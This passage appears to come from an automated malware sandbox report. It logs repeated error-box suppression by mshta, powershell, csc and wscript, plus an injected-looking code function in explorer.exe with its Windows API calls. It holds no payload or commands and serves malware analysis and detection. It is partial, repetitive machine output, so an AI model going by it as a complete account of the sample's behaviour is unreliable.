                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_02CA3862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,20_2_02CA3862
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
